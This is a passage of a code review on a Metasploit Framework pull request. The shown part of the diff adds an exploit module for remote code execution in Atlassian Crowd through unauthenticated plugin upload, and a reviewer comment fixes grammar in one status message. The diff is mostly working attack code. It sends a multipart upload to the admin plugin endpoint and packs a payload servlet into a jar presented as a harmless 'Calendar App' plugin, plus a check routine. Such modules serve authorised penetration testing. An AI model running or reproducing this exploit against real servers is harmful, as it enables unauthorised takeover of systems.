modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb

```diff
@@ -0,0 +1,138 @@
+            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
+          ],
+        'Platform' => %w[java],
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SAFE ]
+          },
+        'Targets' =>
+          [
+            [
+              'Java Universal',
+              {
+                'Arch' => ARCH_JAVA,
+                'Platform' => 'java'
+              }
+            ]
+          ],
+        'DisclosureDate' => '2019-05-22'
+      )
+      )
+
+    register_options(
+      [
+        Opt::RPORT(8095),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/crowd/'])
+      ]
+    )
+  end
+
+  def upload_plugin(content)
+    name = Rex::Text.rand_text_alpha(8..12)
+    boundary = rand_text_numeric(27)
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"file_cdl\"; "
+    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/octet-stream\r\n\r\n"
+    data << content
+    data << "\r\n--#{boundary}--"
+
+    send_request_raw({
+      'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
+      'method' => 'POST',
+      'data' => data,
+      'headers' =>
+        {
+          'Content-Type' => 'multipart/mixed; boundary=' + boundary
+        }
+    }, 25)
+  end
+
+  def generate_plugin_jar
+    name = Rex::Text.rand_text_alpha(8..12)
+    servlet_name = Rex::Text.rand_text_alpha(8..12)
+    atlassian_plugin_xml = %(
+        <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
+          <plugin-info>
+            <param name="atlassian-data-center-compatible">true</param>
+            <description></description>
+            <version>1.0.0</version>
+          </plugin-info>
+
+          <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
+            <url-pattern>/#{name}</url-pattern>
+            <description>Calendar App</description>
+          </servlet>
+        </atlassian-plugin>
+      )
+
+    # Generates .jar file for upload
+    zip = payload.encoded_jar
+    zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+    zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+    contents = zip.pack
+    [contents, name]
+  end
+
+  def check
+    print_status('Sending a test request to try install an invalid plugin to see if the server is vulnerable...')
+    res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
+    if res.nil?
+      return CheckCode::Unknown('Was not able to connect to the target!')
+    elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
+      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating its vulnerable!")
```

Comment:
```suggestion
      return CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
```

Reply:
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423